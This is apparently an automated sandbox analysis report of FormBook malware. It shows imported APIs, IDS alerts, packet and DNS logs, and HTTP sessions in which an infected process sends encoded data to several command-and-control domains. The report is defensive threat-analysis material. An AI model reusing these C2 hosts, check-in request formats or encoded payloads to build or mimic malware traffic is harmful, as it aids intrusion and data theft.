GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-08T14:59:27.901479+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49767 | 154.215.72.110 | 80 | TCP
2025-01-08T15:00:00.101207+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49967 | 116.50.37.244 | 80 | TCP
2025-01-08T15:01:21.693297+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49984 | 85.159.66.93 | 80 | TCP
2025-01-08T15:01:35.281359+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49988 | 91.195.240.94 | 80 | TCP
2025-01-08T15:01:56.879254+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49992 | 66.29.149.46 | 80 | TCP
2025-01-08T15:02:10.386888+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49996 | 195.110.124.133 | 80 | TCP
2025-01-08T15:02:40.141268+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50000 | 217.196.55.202 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                    Jan 8, 2025 15:01:31.849509954 CET4998780192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:31.853368998 CET4998780192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:31.858154058 CET804998791.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:31.858321905 CET804998791.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:32.494259119 CET804998791.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:32.494318008 CET804998791.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:32.494376898 CET4998780192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:33.369528055 CET4998780192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:34.386677027 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:34.391836882 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:34.391937971 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:34.394099951 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:34.398906946 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281248093 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281266928 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281281948 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281358957 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.281388998 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281404972 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281416893 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281435013 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281450987 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.281539917 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281580925 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.281714916 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281728029 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281734943 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.282486916 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.286946058 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.286959887 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.287082911 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.414719105 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.414747953 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.414845943 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.414858103 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.414868116 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.414880991 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.414891958 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.414894104 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.414928913 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.414993048 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.415575981 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.415600061 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.415611029 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.415936947 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.416064978 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.419531107 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.424335957 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:48.662784100 CET4998980192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:48.667642117 CET804998966.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:48.667712927 CET4998980192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:48.669852018 CET4998980192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:48.674659014 CET804998966.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:49.268565893 CET804998966.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:49.268652916 CET804998966.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:49.273348093 CET4998980192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:50.179919004 CET4998980192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:51.198304892 CET4999080192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:51.203191042 CET804999066.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:51.203294039 CET4999080192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:51.207081079 CET4999080192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:51.211877108 CET804999066.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:51.824213982 CET804999066.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:51.824342012 CET804999066.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:51.824453115 CET4999080192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:52.715481043 CET4999080192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:53.729782104 CET4999180192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:53.734672070 CET804999166.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:53.735512972 CET4999180192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:53.737837076 CET4999180192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:53.742662907 CET804999166.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:53.742762089 CET804999166.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:54.347150087 CET804999166.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:54.347244024 CET804999166.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:54.347294092 CET4999180192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:55.243392944 CET4999180192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:56.263375998 CET4999280192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:56.268235922 CET804999266.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:56.268322945 CET4999280192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:56.270982981 CET4999280192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:56.275825977 CET804999266.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:56.879038095 CET804999266.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:56.879199028 CET804999266.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:56.879254103 CET4999280192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:56.882761955 CET4999280192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:56.887562037 CET804999266.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:02:02.068433046 CET4999380192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:02.073283911 CET8049993195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:02.073390961 CET4999380192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:02.103715897 CET4999380192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:02.108539104 CET8049993195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:02.765703917 CET8049993195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:02.766114950 CET8049993195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:02.766172886 CET4999380192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:03.617110968 CET4999380192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:04.636272907 CET4999480192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:04.641143084 CET8049994195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:04.641325951 CET4999480192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:04.643358946 CET4999480192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:04.648211956 CET8049994195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:05.370394945 CET8049994195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:05.370618105 CET8049994195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:05.370712042 CET4999480192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:06.148329973 CET4999480192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:07.166941881 CET4999580192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:07.171873093 CET8049995195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:07.175551891 CET4999580192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:07.179446936 CET4999580192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:07.184242010 CET8049995195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:07.184381962 CET8049995195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:07.852940083 CET8049995195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:07.852979898 CET8049995195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:07.855540037 CET4999580192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:08.679645061 CET4999580192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:09.699443102 CET4999680192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:09.704289913 CET8049996195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:09.704370022 CET4999680192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:09.706173897 CET4999680192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:09.711020947 CET8049996195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:10.386743069 CET8049996195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:10.386780024 CET8049996195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:10.386888027 CET4999680192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:10.391499043 CET4999680192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:10.396276951 CET8049996195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:31.956394911 CET4999780192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:31.961236954 CET8049997217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:31.962671995 CET4999780192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:31.965532064 CET4999780192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:31.970365047 CET8049997217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:32.541184902 CET8049997217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:32.541253090 CET8049997217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:32.541306973 CET4999780192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:33.478759050 CET4999780192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:34.495908976 CET4999880192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:34.501071930 CET8049998217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:34.501148939 CET4999880192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:34.503525972 CET4999880192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:34.508346081 CET8049998217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:35.059575081 CET8049998217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:35.059726954 CET8049998217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:35.061806917 CET4999880192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:36.008080006 CET4999880192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:37.027542114 CET4999980192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:37.032399893 CET8049999217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:37.037743092 CET4999980192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:37.037743092 CET4999980192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:37.042550087 CET8049999217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:37.042687893 CET8049999217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:37.636917114 CET8049999217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:37.637227058 CET8049999217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:37.639584064 CET4999980192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:38.539042950 CET4999980192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:39.559560061 CET5000080192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:39.564407110 CET8050000217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:39.564527988 CET5000080192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:39.566620111 CET5000080192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:39.571362019 CET8050000217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:40.141056061 CET8050000217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:40.141217947 CET8050000217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:40.141268015 CET5000080192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:40.144610882 CET5000080192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:40.149411917 CET8050000217.196.55.202192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                    Jan 8, 2025 15:02:53.433801889 CET192.168.2.51.1.1.10xb899Standard query (0)www.k9vyp11no3.cfdA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:03:01.558661938 CET192.168.2.51.1.1.10x1157Standard query (0)www.shenzhoucui.comA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:03:02.556132078 CET192.168.2.51.1.1.10x1157Standard query (0)www.shenzhoucui.comA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 8, 2025 14:59:26.992649078 CET | 1.1.1.1 | 192.168.2.5 | 0x8b25 | No error (0) | www.3xfootball.com | | 154.215.72.110 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 14:59:42.958199978 CET | 1.1.1.1 | 192.168.2.5 | 0x5e02 | Name error (3) | www.kasegitai.tokyo | none | none | A (IP address) | IN (0x0001) | false
Jan 8, 2025 14:59:51.418337107 CET | 1.1.1.1 | 192.168.2.5 | 0x7860 | No error (0) | www.goldenjade-travel.com | | 116.50.37.244 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:00:05.201582909 CET | 1.1.1.1 | 192.168.2.5 | 0xd92 | Name error (3) | www.antonio-vivaldi.mobi | none | none | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:00:13.372420073 CET | 1.1.1.1 | 192.168.2.5 | 0x9104 | No error (0) | www.magmadokum.com | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 8, 2025 15:00:13.372420073 CET | 1.1.1.1 | 192.168.2.5 | 0x9104 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 8, 2025 15:00:13.372420073 CET | 1.1.1.1 | 192.168.2.5 | 0x9104 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:01:26.768699884 CET | 1.1.1.1 | 192.168.2.5 | 0xce56 | No error (0) | www.rssnewscast.com | | 91.195.240.94 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:01:40.443769932 CET | 1.1.1.1 | 192.168.2.5 | 0xa944 | Name error (3) | www.liangyuen528.com | none | none | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:01:48.659955978 CET | 1.1.1.1 | 192.168.2.5 | 0x76c9 | No error (0) | www.techchains.info | | 66.29.149.46 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:02:02.050198078 CET | 1.1.1.1 | 192.168.2.5 | 0xb719 | No error (0) | www.elettrosistemista.zip | elettrosistemista.zip | | CNAME (Canonical name) | IN (0x0001) | false
Jan 8, 2025 15:02:02.050198078 CET | 1.1.1.1 | 192.168.2.5 | 0xb719 | No error (0) | elettrosistemista.zip | | 195.110.124.133 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:02:15.436481953 CET | 1.1.1.1 | 192.168.2.5 | 0xd8b7 | Name error (3) | www.donnavariedades.com | none | none | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:02:23.847479105 CET | 1.1.1.1 | 192.168.2.5 | 0xc7a1 | Name error (3) | www.660danm.top | none | none | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:02:31.953454971 CET | 1.1.1.1 | 192.168.2.5 | 0x4046 | No error (0) | www.empowermedeco.com | empowermedeco.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 8, 2025 15:02:31.953454971 CET | 1.1.1.1 | 192.168.2.5 | 0x4046 | No error (0) | empowermedeco.com | | 217.196.55.202 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:02:45.371803999 CET | 1.1.1.1 | 192.168.2.5 | 0x48b0 | Name error (3) | www.joyesi.xyz | none | none | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:02:53.442931890 CET | 1.1.1.1 | 192.168.2.5 | 0xb899 | Name error (3) | www.k9vyp11no3.cfd | none | none | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:03:02.604357004 CET | 1.1.1.1 | 192.168.2.5 | 0x1157 | Name error (3) | www.shenzhoucui.com | none | none | A (IP address) | IN (0x0001) | false
Jan 8, 2025 15:03:02.607907057 CET | 1.1.1.1 | 192.168.2.5 | 0x1157 | Name error (3) | www.shenzhoucui.com | none | none | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49767 | 154.215.72.110 | 80 | 3200 | C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 14:59:27.006340981 CET | 515 | OUT | GET /fo8o/?Dvh=YnI07v&Ubhdm=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.3xfootball.com
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 8, 2025 14:59:27.901184082 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 08 Jan 2025 13:59:27 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49919 | 116.50.37.244 | 80 | 3200 | C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 14:59:51.427485943 CET | 801 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.goldenjade-travel.com
Origin: http://www.goldenjade-travel.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 206
Referer: http://www.goldenjade-travel.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Data Ascii: Ubhdm=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO+yMgKUf7lnBSTXEEH5deQraU14cJZaPRWsUkX4=
Jan 8, 2025 14:59:52.317792892 CET | 492 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 08 Jan 2025 13:59:51 GMT
Connection: close
Content-Length: 315
Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49939 | 116.50.37.244 | 80 | 3200 | C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 14:59:53.955218077 CET | 821 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.goldenjade-travel.com
Origin: http://www.goldenjade-travel.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 226
Referer: http://www.goldenjade-travel.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Data Ascii: Ubhdm=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwHiEmwrYp7mL18k6Asajw5+yexyx4RsrUrOpdD4
Jan 8, 2025 14:59:54.832896948 CET | 492 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 08 Jan 2025 13:59:54 GMT
Connection: close
Content-Length: 315
Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49951 | 116.50.37.244 | 80 | 3200 | C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
Timestamp | Bytes transferred | Direction | Data
